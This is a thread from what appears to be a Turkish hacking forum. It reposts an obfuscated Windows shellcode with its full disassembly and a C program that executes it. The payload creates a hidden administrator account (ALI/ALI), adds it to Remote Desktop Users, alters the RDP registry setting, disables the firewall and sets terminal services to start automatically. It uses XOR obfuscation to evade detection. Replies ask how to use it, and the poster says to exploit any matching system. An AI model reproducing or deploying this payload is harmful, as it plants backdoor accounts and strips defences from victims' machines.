1.                                                

Obfuscated Shellcode Windows x64 - [1218 Bytes] Add Administrator User/Pass ALI/ALI & Add ALI To RDP

'Exploit Shellcode Archive' forumunda r00ts4 tarafından 7 Temmuz 2015 tarihinde açılan konu

  1. r00ts4

    r00ts4 Administrator Site Yetkilisi

    Katılım:
    20 Aralık 2014
    Mesaj:
    597
    Beğeniler:
    54
    Ödül Puanları:
    28

    #Author: Ali Razmjoo
    #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
    Obfuscated Shellcode Windows x64 [1218 Bytes].c

    /*
    #Title: Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery & STOP Firewall & Auto Start terminal service]
    #length: 1218 bytes
    #Date: 13 January 2015
    #Author: Ali Razmjoo
    #tested On: Windows 7 x64 ultimate

    WinExec => 0x769e2c91
    ExitProcess => 0x769679f8
    ====================================
    Execute :
    net user ALI ALI /add
    net localgroup Administrators ALI /add
    NET LOCALGROUP "Remote Desktop Users" ALI /add
    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
    netsh firewall set opmode disable
    sc config termservice start= auto
    ====================================



    Ali Razmjoo , ['[email protected]','[email protected]']

    Thanks to my friends , Dariush Nasirpour and Ehsan Nezami


    C:\Users\Ali\Desktop>objdump -D shellcode.o

    shellcode.o: file format elf32-i386


    Disassembly of section .text:

    00000000 <.text>:
    0: 31 c0 xor %eax,%eax
    2: 50 push %eax
    3: b8 41 41 41 64 mov $0x64414141,%eax
    8: c1 e8 08 shr $0x8,%eax
    b: c1 e8 08 shr $0x8,%eax
    e: c1 e8 08 shr $0x8,%eax
    11: 50 push %eax
    12: b9 6d 76 53 52 mov $0x5253766d,%ecx
    17: ba 4d 59 32 36 mov $0x3632594d,%edx
    1c: 31 d1 xor %edx,%ecx
    1e: 51 push %ecx
    1f: b9 6e 72 61 71 mov $0x7161726e,%ecx
    24: ba 4e 33 2d 38 mov $0x382d334e,%edx
    29: 31 d1 xor %edx,%ecx
    2b: 51 push %ecx
    2c: b9 6c 75 78 78 mov $0x7878756c,%ecx
    31: ba 4c 34 34 31 mov $0x3134344c,%edx
    36: 31 d1 xor %edx,%ecx
    38: 51 push %ecx
    39: b9 46 47 57 46 mov $0x46574746,%ecx
    3e: ba 33 34 32 34 mov $0x34323433,%edx
    43: 31 d1 xor %edx,%ecx
    45: 51 push %ecx
    46: b9 56 50 47 64 mov $0x64475056,%ecx
    4b: ba 38 35 33 44 mov $0x44333538,%edx
    50: 31 d1 xor %edx,%ecx
    52: 51 push %ecx
    53: 89 e0 mov %esp,%eax
    55: bb 41 41 41 01 mov $0x1414141,%ebx
    5a: c1 eb 08 shr $0x8,%ebx
    5d: c1 eb 08 shr $0x8,%ebx
    60: c1 eb 08 shr $0x8,%ebx
    63: 53 push %ebx
    64: 50 push %eax
    65: bb dc 7a a8 23 mov $0x23a87adc,%ebx
    6a: ba 4d 56 36 55 mov $0x5536564d,%edx
    6f: 31 d3 xor %edx,%ebx
    71: ff d3 call *%ebx
    73: 31 c0 xor %eax,%eax
    75: 50 push %eax
    76: 68 41 41 64 64 push $0x64644141
    7b: 58 pop %eax
    7c: c1 e8 08 shr $0x8,%eax
    7f: c1 e8 08 shr $0x8,%eax
    82: 50 push %eax
    83: b9 01 41 60 32 mov $0x32604101,%ecx
    88: ba 48 61 4f 53 mov $0x534f6148,%edx
    8d: 31 d1 xor %edx,%ecx
    8f: 51 push %ecx
    90: b9 28 47 0d 2f mov $0x2f0d4728,%ecx
    95: ba 5b 67 4c 63 mov $0x634c675b,%edx
    9a: 31 d1 xor %edx,%ecx
    9c: 51 push %ecx
    9d: b9 03 24 36 21 mov $0x21362403,%ecx
    a2: ba 62 50 59 53 mov $0x53595062,%edx
    a7: 31 d1 xor %edx,%ecx
    a9: 51 push %ecx
    aa: b9 34 41 15 18 mov $0x18154134,%ecx
    af: ba 5d 32 61 6a mov $0x6a61325d,%edx
    b4: 31 d1 xor %edx,%ecx
    b6: 51 push %ecx
    b7: b9 0c 05 1b 25 mov $0x251b050c,%ecx
    bc: ba 68 68 72 4b mov $0x4b726868,%edx
    c1: 31 d1 xor %edx,%ecx
    c3: 51 push %ecx
    c4: b9 2f 27 7b 13 mov $0x137b272f,%ecx
    c9: ba 5a 57 5b 52 mov $0x525b575a,%edx
    ce: 31 d1 xor %edx,%ecx
    d0: 51 push %ecx
    d1: b9 1c 2c 02 3e mov $0x3e022c1c,%ecx
    d6: ba 70 4b 70 51 mov $0x51704b70,%edx
    db: 31 d1 xor %edx,%ecx
    dd: 51 push %ecx
    de: b9 3d 2a 32 4c mov $0x4c322a3d,%ecx
    e3: ba 51 45 51 2d mov $0x2d514551,%edx
    e8: 31 d1 xor %edx,%ecx
    ea: 51 push %ecx
    eb: b9 23 5c 1c 19 mov $0x191c5c23,%ecx
    f0: ba 4d 39 68 39 mov $0x3968394d,%edx
    f5: 31 d1 xor %edx,%ecx
    f7: 51 push %ecx
    f8: 89 e0 mov %esp,%eax
    fa: bb 41 41 41 01 mov $0x1414141,%ebx
    ff: c1 eb 08 shr $0x8,%ebx
    102: c1 eb 08 shr $0x8,%ebx
    105: c1 eb 08 shr $0x8,%ebx
    108: 53 push %ebx
    109: 50 push %eax
    10a: bb dc 7a a8 23 mov $0x23a87adc,%ebx
    10f: ba 4d 56 36 55 mov $0x5536564d,%edx
    114: 31 d3 xor %edx,%ebx
    116: ff d3 call *%ebx
    118: 31 c0 xor %eax,%eax
    11a: 50 push %eax
    11b: 68 41 41 64 64 push $0x64644141
    120: 58 pop %eax
    121: c1 e8 08 shr $0x8,%eax
    124: c1 e8 08 shr $0x8,%eax
    127: 50 push %eax
    128: b9 02 63 6b 35 mov $0x356b6302,%ecx
    12d: ba 4b 43 44 54 mov $0x5444434b,%edx
    132: 31 d1 xor %edx,%ecx
    134: 51 push %ecx
    135: b9 61 55 6c 3d mov $0x3d6c5561,%ecx
    13a: ba 43 75 2d 71 mov $0x712d7543,%edx
    13f: 31 d1 xor %edx,%ecx
    141: 51 push %ecx
    142: b9 27 3f 3b 1a mov $0x1a3b3f27,%ecx
    147: ba 54 5a 49 69 mov $0x69495a54,%edx
    14c: 31 d1 xor %edx,%ecx
    14e: 51 push %ecx
    14f: b9 25 34 12 67 mov $0x67123425,%ecx
    154: ba 4a 44 32 32 mov $0x3232444a,%edx
    159: 31 d1 xor %edx,%ecx
    15b: 51 push %ecx
    15c: b9 0b 02 1f 19 mov $0x191f020b,%ecx
    161: ba 6e 71 74 6d mov $0x6d74716e,%edx
    166: 31 d1 xor %edx,%ecx
    168: 51 push %ecx
    169: b9 39 3f 7b 15 mov $0x157b3f39,%ecx
    16e: ba 4d 5a 5b 51 mov $0x515b5a4d,%edx
    173: 31 d1 xor %edx,%ecx
    175: 51 push %ecx
    176: b9 35 15 03 2a mov $0x2a031535,%ecx
    17b: ba 67 70 6e 45 mov $0x456e7067,%edx
    180: 31 d1 xor %edx,%ecx
    182: 51 push %ecx
    183: b9 3a 17 75 46 mov $0x4675173a,%ecx
    188: ba 6f 47 55 64 mov $0x6455476f,%edx
    18d: 31 d1 xor %edx,%ecx
    18f: 51 push %ecx
    190: b9 26 35 0b 1e mov $0x1e0b3526,%ecx
    195: ba 6a 72 59 51 mov $0x5159726a,%edx
    19a: 31 d1 xor %edx,%ecx
    19c: 51 push %ecx
    19d: b9 2a 2a 06 2a mov $0x2a062a2a,%ecx
    1a2: ba 66 65 45 6b mov $0x6b456566,%edx
    1a7: 31 d1 xor %edx,%ecx
    1a9: 51 push %ecx
    1aa: b9 1d 20 35 5a mov $0x5a35201d,%ecx
    1af: ba 53 65 61 7a mov $0x7a616553,%edx
    1b4: 31 d1 xor %edx,%ecx
    1b6: 51 push %ecx
    1b7: 89 e0 mov %esp,%eax
    1b9: bb 41 41 41 01 mov $0x1414141,%ebx
    1be: c1 eb 08 shr $0x8,%ebx
    1c1: c1 eb 08 shr $0x8,%ebx
    1c4: c1 eb 08 shr $0x8,%ebx
    1c7: 53 push %ebx
    1c8: 50 push %eax
    1c9: bb dc 7a a8 23 mov $0x23a87adc,%ebx
    1ce: ba 4d 56 36 55 mov $0x5536564d,%edx
    1d3: 31 d3 xor %edx,%ebx
    1d5: ff d3 call *%ebx
    1d7: 31 c0 xor %eax,%eax
    1d9: 50 push %eax
    1da: b9 09 4c 7c 5e mov $0x5e7c4c09,%ecx
    1df: ba 38 6c 53 38 mov $0x38536c38,%edx
    1e4: 31 d1 xor %edx,%ecx
    1e6: 51 push %ecx
    1e7: b9 42 4d 39 14 mov $0x14394d42,%ecx
    1ec: ba 62 62 5d 34 mov $0x345d6262,%edx
    1f1: 31 d1 xor %edx,%ecx
    1f3: 51 push %ecx
    1f4: b9 7a 24 26 75 mov $0x7526247a,%ecx
    1f9: ba 2d 6b 74 31 mov $0x31746b2d,%edx
    1fe: 31 d1 xor %edx,%ecx
    200: 51 push %ecx
    201: b9 1d 30 15 28 mov $0x2815301d,%ecx
    206: ba 58 77 4a 6c mov $0x6c4a7758,%edx
    20b: 31 d1 xor %edx,%ecx
    20d: 51 push %ecx
    20e: b9 7c 2f 57 16 mov $0x16572f7c,%ecx
    213: ba 53 5b 77 44 mov $0x44775b53,%edx
    218: 31 d1 xor %edx,%ecx
    21a: 51 push %ecx
    21b: b9 42 25 2a 66 mov $0x662a2542,%ecx
    220: ba 2d 4b 59 46 mov $0x46594b2d,%edx
    225: 31 d1 xor %edx,%ecx
    227: 51 push %ecx
    228: b9 28 2f 0c 5a mov $0x5a0c2f28,%ecx
    22d: ba 4d 4c 78 33 mov $0x33784c4d,%edx
    232: 31 d1 xor %edx,%ecx
    234: 51 push %ecx
    235: b9 20 2b 26 26 mov $0x26262b20,%ecx
    23a: ba 63 44 48 48 mov $0x48484463,%edx
    23f: 31 d1 xor %edx,%ecx
    241: 51 push %ecx
    242: b9 08 2b 23 67 mov $0x67232b08,%ecx
    247: ba 66 52 77 34 mov $0x34775266,%edx
    24c: 31 d1 xor %edx,%ecx
    24e: 51 push %ecx
    24f: b9 49 1c 2e 48 mov $0x482e1c49,%ecx
    254: ba 69 7a 6a 2d mov $0x2d6a7a69,%edx
    259: 31 d1 xor %edx,%ecx
    25b: 51 push %ecx
    25c: b9 67 67 1d 37 mov $0x371d6767,%ecx
    261: ba 45 47 32 41 mov $0x41324745,%edx
    266: 31 d1 xor %edx,%ecx
    268: 51 push %ecx
    269: b9 03 33 0d 3b mov $0x3b0d3303,%ecx
    26e: ba 71 45 68 49 mov $0x49684571,%edx
    273: 31 d1 xor %edx,%ecx
    275: 51 push %ecx
    276: b9 39 6a 3c 2f mov $0x2f3c6a39,%ecx
    27b: ba 55 4a 6f 4a mov $0x4a6f4a55,%edx
    280: 31 d1 xor %edx,%ecx
    282: 51 push %ecx
    283: b9 37 44 1f 2e mov $0x2e1f4437,%ecx
    288: ba 5a 2d 71 4f mov $0x4f712d5a,%edx
    28d: 31 d1 xor %edx,%ecx
    28f: 51 push %ecx
    290: b9 34 23 23 3b mov $0x3b232334,%ecx
    295: ba 68 77 46 49 mov $0x49467768,%edx
    29a: 31 d1 xor %edx,%ecx
    29c: 51 push %ecx
    29d: b9 07 3a 0a 14 mov $0x140a3a07,%ecx
    2a2: ba 73 48 65 78 mov $0x78654873,%edx
    2a7: 31 d1 xor %edx,%ecx
    2a9: 51 push %ecx
    2aa: b9 14 2e 58 53 mov $0x53582e14,%ecx
    2af: ba 48 6d 37 3d mov $0x3d376d48,%edx
    2b4: 31 d1 xor %edx,%ecx
    2b6: 51 push %ecx
    2b7: b9 3e 3d 26 32 mov $0x32263d3e,%ecx
    2bc: ba 52 6e 43 46 mov $0x46436e52,%edx
    2c1: 31 d1 xor %edx,%ecx
    2c3: 51 push %ecx
    2c4: b9 33 3c 35 34 mov $0x34353c33,%ecx
    2c9: ba 5d 48 47 5b mov $0x5b47485d,%edx
    2ce: 31 d1 xor %edx,%ecx
    2d0: 51 push %ecx
    2d1: b9 36 0e 07 2b mov $0x2b070e36,%ecx
    2d6: ba 58 7a 44 44 mov $0x44447a58,%edx
    2db: 31 d1 xor %edx,%ecx
    2dd: 51 push %ecx
    2de: b9 3c 10 0a 37 mov $0x370a103c,%ecx
    2e3: ba 49 62 78 52 mov $0x52786249,%edx
    2e8: 31 d1 xor %edx,%ecx
    2ea: 51 push %ecx
    2eb: b9 24 7c 3b 36 mov $0x363b7c24,%ecx
    2f0: ba 61 31 67 75 mov $0x75673161,%edx
    2f5: 31 d1 xor %edx,%ecx
    2f7: 51 push %ecx
    2f8: b9 31 3d 3b 27 mov $0x273b3d31,%ecx
    2fd: ba 62 64 68 73 mov $0x73686462,%edx
    302: 31 d1 xor %edx,%ecx
    304: 51 push %ecx
    305: b9 7f 7d 3d 35 mov $0x353d7d7f,%ecx
    30a: ba 36 33 78 69 mov $0x69783336,%edx
    30f: 31 d1 xor %edx,%ecx
    311: 51 push %ecx
    312: b9 7c 13 0f 2f mov $0x2f0f137c,%ecx
    317: ba 31 52 4c 67 mov $0x674c5231,%edx
    31c: 31 d1 xor %edx,%ecx
    31e: 51 push %ecx
    31f: b9 1b 08 35 2d mov $0x2d35081b,%ecx
    324: ba 58 49 79 72 mov $0x72794958,%edx
    329: 31 d1 xor %edx,%ecx
    32b: 51 push %ecx
    32c: b9 74 3a 1e 21 mov $0x211e3a74,%ecx
    331: ba 2d 65 52 6e mov $0x6e52652d,%edx
    336: 31 d1 xor %edx,%ecx
    338: 51 push %ecx
    339: b9 16 10 1f 17 mov $0x171f1016,%ecx
    33e: ba 34 58 54 52 mov $0x52545834,%edx
    343: 31 d1 xor %edx,%ecx
    345: 51 push %ecx
    346: b9 2f 27 0c 6e mov $0x6e0c272f,%ecx
    34b: ba 4e 43 68 4e mov $0x4e68434e,%edx
    350: 31 d1 xor %edx,%ecx
    352: 51 push %ecx
    353: b9 39 22 5e 50 mov $0x505e2239,%ecx
    358: ba 4b 47 39 70 mov $0x7039474b,%edx
    35d: 31 d1 xor %edx,%ecx
    35f: 51 push %ecx
    360: 89 e0 mov %esp,%eax
    362: bb 41 41 41 01 mov $0x1414141,%ebx
    367: c1 eb 08 shr $0x8,%ebx
    36a: c1 eb 08 shr $0x8,%ebx
    36d: c1 eb 08 shr $0x8,%ebx
    370: 53 push %ebx
    371: 50 push %eax
    372: bb dc 7a a8 23 mov $0x23a87adc,%ebx
    377: ba 4d 56 36 55 mov $0x5536564d,%edx
    37c: 31 d3 xor %edx,%ebx
    37e: ff d3 call *%ebx
    380: 31 c0 xor %eax,%eax
    382: 50 push %eax
    383: b8 41 41 41 65 mov $0x65414141,%eax
    388: c1 e8 08 shr $0x8,%eax
    38b: c1 e8 08 shr $0x8,%eax
    38e: c1 e8 08 shr $0x8,%eax
    391: 50 push %eax
    392: b9 1e 53 39 3c mov $0x3c39531e,%ecx
    397: ba 6d 32 5b 50 mov $0x505b326d,%edx
    39c: 31 d1 xor %edx,%ecx
    39e: 51 push %ecx
    39f: b9 04 66 2f 32 mov $0x322f6604,%ecx
    3a4: ba 61 46 4b 5b mov $0x5b4b4661,%edx
    3a9: 31 d1 xor %edx,%ecx
    3ab: 51 push %ecx
    3ac: b9 19 1e 0d 11 mov $0x110d1e19,%ecx
    3b1: ba 69 73 62 75 mov $0x75627369,%edx
    3b6: 31 d1 xor %edx,%ecx
    3b8: 51 push %ecx
    3b9: b9 20 41 47 36 mov $0x36474120,%ecx
    3be: ba 45 35 67 59 mov $0x59673545,%edx
    3c3: 31 d1 xor %edx,%ecx
    3c5: 51 push %ecx
    3c6: b9 2b 05 64 2a mov $0x2a64052b,%ecx
    3cb: ba 47 69 44 59 mov $0x59446947,%edx
    3d0: 31 d1 xor %edx,%ecx
    3d2: 51 push %ecx
    3d3: b9 10 3f 4f 22 mov $0x224f3f10,%ecx
    3d8: ba 62 5a 38 43 mov $0x43385a62,%edx
    3dd: 31 d1 xor %edx,%ecx
    3df: 51 push %ecx
    3e0: b9 2a 6f 2a 24 mov $0x242a6f2a,%ecx
    3e5: ba 42 4f 4c 4d mov $0x4d4c4f42,%edx
    3ea: 31 d1 xor %edx,%ecx
    3ec: 51 push %ecx
    3ed: b9 29 09 1e 5e mov $0x5e1e0929,%ecx
    3f2: ba 47 6c 6a 2d mov $0x2d6a6c47,%edx
    3f7: 31 d1 xor %edx,%ecx
    3f9: 51 push %ecx
    3fa: 89 e0 mov %esp,%eax
    3fc: bb 41 41 41 01 mov $0x1414141,%ebx
    401: c1 eb 08 shr $0x8,%ebx
    404: c1 eb 08 shr $0x8,%ebx
    407: c1 eb 08 shr $0x8,%ebx
    40a: 53 push %ebx
    40b: 50 push %eax
    40c: bb dc 7a a8 23 mov $0x23a87adc,%ebx
    411: ba 4d 56 36 55 mov $0x5536564d,%edx
    416: 31 d3 xor %edx,%ebx
    418: ff d3 call *%ebx
    41a: 31 c0 xor %eax,%eax
    41c: 50 push %eax
    41d: b8 41 41 41 6f mov $0x6f414141,%eax
    422: c1 e8 08 shr $0x8,%eax
    425: c1 e8 08 shr $0x8,%eax
    428: c1 e8 08 shr $0x8,%eax
    42b: 50 push %eax
    42c: b9 72 2a 05 39 mov $0x39052a72,%ecx
    431: ba 52 4b 70 4d mov $0x4d704b52,%edx
    436: 31 d1 xor %edx,%ecx
    438: 51 push %ecx
    439: b9 54 3a 05 52 mov $0x52053a54,%ecx
    43e: ba 35 48 71 6f mov $0x6f714835,%edx
    443: 31 d1 xor %edx,%ecx
    445: 51 push %ecx
    446: b9 29 16 0a 47 mov $0x470a1629,%ecx
    44b: ba 4c 36 79 33 mov $0x3379364c,%edx
    450: 31 d1 xor %edx,%ecx
    452: 51 push %ecx
    453: b9 27 1b 5b 3e mov $0x3e5b1b27,%ecx
    458: ba 55 6d 32 5d mov $0x5d326d55,%edx
    45d: 31 d1 xor %edx,%ecx
    45f: 51 push %ecx
    460: b9 33 1a 3b 10 mov $0x103b1a33,%ecx
    465: ba 41 77 48 75 mov $0x75487741,%edx
    46a: 31 d1 xor %edx,%ecx
    46c: 51 push %ecx
    46d: b9 34 79 3a 12 mov $0x123a7934,%ecx
    472: ba 53 59 4e 77 mov $0x774e5953,%edx
    477: 31 d1 xor %edx,%ecx
    479: 51 push %ecx
    47a: b9 1d 5c 1e 28 mov $0x281e5c1d,%ecx
    47f: ba 72 32 78 41 mov $0x41783272,%edx
    484: 31 d1 xor %edx,%ecx
    486: 51 push %ecx
    487: b9 2a 4e 5a 28 mov $0x285a4e2a,%ecx
    48c: ba 59 2d 7a 4b mov $0x4b7a2d59,%edx
    491: 31 d1 xor %edx,%ecx
    493: 51 push %ecx
    494: 89 e0 mov %esp,%eax
    496: bb 41 41 41 01 mov $0x1414141,%ebx
    49b: c1 eb 08 shr $0x8,%ebx
    49e: c1 eb 08 shr $0x8,%ebx
    4a1: c1 eb 08 shr $0x8,%ebx
    4a4: 53 push %ebx
    4a5: 50 push %eax
    4a6: bb dc 7a a8 23 mov $0x23a87adc,%ebx
    4ab: ba 4d 56 36 55 mov $0x5536564d,%edx
    4b0: 31 d3 xor %edx,%ebx
    4b2: ff d3 call *%ebx
    4b4: bb 9b 4f d0 30 mov $0x30d04f9b,%ebx
    4b9: ba 63 36 46 46 mov $0x46463663,%edx
    4be: 31 d3 xor %edx,%ebx
    4c0: ff d3 call *%ebx
    */
    #include <stdio.h>
    #include <string.h>
    int main(){
    unsigned char shellcode[]= "\x31\xc0\x50\xb8\x41\x41\x41\x64\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x6d\x76\x53\x52\xba\x4d\x59\x32\x36\x31\xd1\x51\xb9\x6e\x72\x61\x71\xba\x4e\x33\x2d\x38\x31\xd1\x51\xb9\x6c\x75\x78\x78\xba\x4c\x34\x34\x31\x31\xd1\x51\xb9\x46\x47\x57\x46\xba\x33\x34\x32\x34\x31\xd1\x51\xb9\x56\x50\x47\x64\xba\x38\x35\x33\x44\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x01\x41\x60\x32\xba\x48\x61\x4f\x53\x31\xd1\x51\xb9\x28\x47\x0d\x2f\xba\x5b\x67\x4c\x63\x31\xd1\x51\xb9\x03\x24\x36\x21\xba\x62\x50\x59\x53\x31\xd1\x51\xb9\x34\x41\x15\x18\xba\x5d\x32\x61\x6a\x31\xd1\x51\xb9\x0c\x05\x1b\x25\xba\x68\x68\x72\x4b\x31\xd1\x51\xb9\x2f\x27\x7b\x13\xba\x5a\x57\x5b\x52\x31\xd1\x51\xb9\x1c\x2c\x02\x3e\xba\x70\x4b\x70\x51\x31\xd1\x51\xb9\x3d\x2a\x32\x4c\xba\x51\x45\x51\x2d\x31\xd1\x51\xb9\x23\x5c\x1c\x19\xba\x4d\x39\x68\x39\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\x68\x41\x41\x64\x64\x58\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x02\x63\x6b\x35\xba\x4b\x43\x44\x54\x31\xd1\x51\xb9\x61\x55\x6c\x3d\xba\x43\x75\x2d\x71\x31\xd1\x51\xb9\x27\x3f\x3b\x1a\xba\x54\x5a\x49\x69\x31\xd1\x51\xb9\x25\x34\x12\x67\xba\x4a\x44\x32\x32\x31\xd1\x51\xb9\x0b\x02\x1f\x19\xba\x6e\x71\x74\x6d\x31\xd1\x51\xb9\x39\x3f\x7b\x15\xba\x4d\x5a\x5b\x51\x31\xd1\x51\xb9\x35\x15\x03\x2a\xba\x67\x70\x6e\x45\x31\xd1\x51\xb9\x3a\x17\x75\x46\xba\x6f\x47\x55\x64\x31\xd1\x51\xb9\x26\x35\x0b\x1e\xba\x6a\x72\x59\x51\x31\xd1\x51\xb9\x2a\x2a\x06\x2a\xba\x66\x65\x45\x6b\x31\xd1\x51\xb9\x1d\x20\x35\x5a\xba\x53\x65\x61\x7a\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb9\x09\x4c\x7c\x5e\xba\x38\x6c\x53\x38\x31\xd1\x51\xb9\x42\x4d\x39\x14\xba\x62\x62\x5d\x34\x31\xd1\x51\xb9\x7a\x24\x26\x75\xba\x2d\x6b\x74\x31\x31\xd1\x51\xb9\x1d\x30\x15\x28\xba\x58\x77\x4a\x6c\x31\xd1\x51\xb9\x7c\x2f\x57\x16\xba\x53\x5b\x77\x44\x31\xd1\x51\xb9\x42\x25\x2a\x66\xba\x2d\x4b\x59\x46\x31\xd1\x51\xb9\x28\x2f\x0c\x5a\xba\x4d\x4c\x78\x33\x31\xd1\x51\xb9\x20\x2b\x26\x26\xba\x63\x44\x48\x48\x31\xd1\x51\xb9\x08\x2b\x23\x67\xba\x66\x52\x77\x34\x31\xd1\x51\xb9\x49\x1c\x2e\x48\xba\x69\x7a\x6a\x2d\x31\xd1\x51\xb9\x67\x67\x1d\x37\xba\x45\x47\x32\x41\x31\xd1\x51\xb9\x03\x33\x0d\x3b\xba\x71\x45\x68\x49\x31\xd1\x51\xb9\x39\x6a\x3c\x2f\xba\x55\x4a\x6f\x4a\x31\xd1\x51\xb9\x37\x44\x1f\x2e\xba\x5a\x2d\x71\x4f\x31\xd1\x51\xb9\x34\x23\x23\x3b\xba\x68\x77\x46\x49\x31\xd1\x51\xb9\x07\x3a\x0a\x14\xba\x73\x48\x65\x78\x31\xd1\x51\xb9\x14\x2e\x58\x53\xba\x48\x6d\x37\x3d\x31\xd1\x51\xb9\x3e\x3d\x26\x32\xba\x52\x6e\x43\x46\x31\xd1\x51\xb9\x33\x3c\x35\x34\xba\x5d\x48\x47\x5b\x31\xd1\x51\xb9\x36\x0e\x07\x2b\xba\x58\x7a\x44\x44\x31\xd1\x51\xb9\x3c\x10\x0a\x37\xba\x49\x62\x78\x52\x31\xd1\x51\xb9\x24\x7c\x3b\x36\xba\x61\x31\x67\x75\x31\xd1\x51\xb9\x31\x3d\x3b\x27\xba\x62\x64\x68\x73\x31\xd1\x51\xb9\x7f\x7d\x3d\x35\xba\x36\x33\x78\x69\x31\xd1\x51\xb9\x7c\x13\x0f\x2f\xba\x31\x52\x4c\x67\x31\xd1\x51\xb9\x1b\x08\x35\x2d\xba\x58\x49\x79\x72\x31\xd1\x51\xb9\x74\x3a\x1e\x21\xba\x2d\x65\x52\x6e\x31\xd1\x51\xb9\x16\x10\x1f\x17\xba\x34\x58\x54\x52\x31\xd1\x51\xb9\x2f\x27\x0c\x6e\xba\x4e\x43\x68\x4e\x31\xd1\x51\xb9\x39\x22\x5e\x50\xba\x4b\x47\x39\x70\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x65\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x1e\x53\x39\x3c\xba\x6d\x32\x5b\x50\x31\xd1\x51\xb9\x04\x66\x2f\x32\xba\x61\x46\x4b\x5b\x31\xd1\x51\xb9\x19\x1e\x0d\x11\xba\x69\x73\x62\x75\x31\xd1\x51\xb9\x20\x41\x47\x36\xba\x45\x35\x67\x59\x31\xd1\x51\xb9\x2b\x05\x64\x2a\xba\x47\x69\x44\x59\x31\xd1\x51\xb9\x10\x3f\x4f\x22\xba\x62\x5a\x38\x43\x31\xd1\x51\xb9\x2a\x6f\x2a\x24\xba\x42\x4f\x4c\x4d\x31\xd1\x51\xb9\x29\x09\x1e\x5e\xba\x47\x6c\x6a\x2d\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\x31\xc0\x50\xb8\x41\x41\x41\x6f\xc1\xe8\x08\xc1\xe8\x08\xc1\xe8\x08\x50\xb9\x72\x2a\x05\x39\xba\x52\x4b\x70\x4d\x31\xd1\x51\xb9\x54\x3a\x05\x52\xba\x35\x48\x71\x6f\x31\xd1\x51\xb9\x29\x16\x0a\x47\xba\x4c\x36\x79\x33\x31\xd1\x51\xb9\x27\x1b\x5b\x3e\xba\x55\x6d\x32\x5d\x31\xd1\x51\xb9\x33\x1a\x3b\x10\xba\x41\x77\x48\x75\x31\xd1\x51\xb9\x34\x79\x3a\x12\xba\x53\x59\x4e\x77\x31\xd1\x51\xb9\x1d\x5c\x1e\x28\xba\x72\x32\x78\x41\x31\xd1\x51\xb9\x2a\x4e\x5a\x28\xba\x59\x2d\x7a\x4b\x31\xd1\x51\x89\xe0\xbb\x41\x41\x41\x01\xc1\xeb\x08\xc1\xeb\x08\xc1\xeb\x08\x53\x50\xbb\xdc\x7a\xa8\x23\xba\x4d\x56\x36\x55\x31\xd3\xff\xd3\xbb\x9b\x4f\xd0\x30\xba\x63\x36\x46\x46\x31\xd3\xff\xd3";
    fprintf(stdout,"Length: %d\n\n",strlen(shellcode));
    (*(void(*)()) shellcode)();
    }
     
  2. NFRAx

    NFRAx New Member

    Katılım:
    3 Mayıs 2015
    Mesaj:
    39
    Beğeniler:
    0
    Ödül Puanları:
    0
    iyi günler
    Biz bunu nasıl kullanıcaz ?
     
  3. r00ts4

    r00ts4 Administrator Site Yetkilisi

    Katılım:
    20 Aralık 2014
    Mesaj:
    597
    Beğeniler:
    54
    Ödül Puanları:
    28
    Obfuscated Shellcode Windows x64 [1218 Bytes] [Add Administrator User/Pass ALI/ALI & Add ALI to RDP Group & Enable RDP From Registery &STOP Firewall & Auto Start terminal service]
    Obfuscated Shellcode Windows x64 [1218 Bytes].c burda anlatılana uygun sistem bulursan bununla exploit edebilirsin
     
  4. Comedy

    Comedy Albay

    Katılım:
    15 Ağustos 2015
    Mesaj:
    105
    Beğeniler:
    0
    Ödül Puanları:
    16
    Şehir:
    Belirtilmemiş
    bundan hic birsey anlamadim bu ne shell mi yoksa shell icinde farkli bir cod veya ne ise yarar bu

    bu isi yakinda cozecegim :))
     
  5. exploit

    exploit New Member

    Katılım:
    17 Eylül 2015
    Mesaj:
    104
    Beğeniler:
    1
    Ödül Puanları:
    0
    Bu exploit kullanılan yazılıma harici kod ekler shell code ile sisteme bağlanırsın . Exploit konusunda konu açıcam takip de kalın
     
  6. ruger

    ruger Member

    Katılım:
    7 Eylül 2015
    Mesaj:
    50
    Beğeniler:
    3
    Ödül Puanları:
    8
    Cinsiyet:
    Erkek
    assembly ile AT&T türünde yazıldığı için pek anlaşılmıyor o_O:rolleyes::D
     
  7. ProHacker

    ProHacker Albay

    Katılım:
    20 Mart 2016
    Mesaj:
    434
    Beğeniler:
    1
    Ödül Puanları:
    18
    Şehir:
    Belirtilmemiş
    İşe yarar ;)
     

Bu Sayfayı Paylaş

Share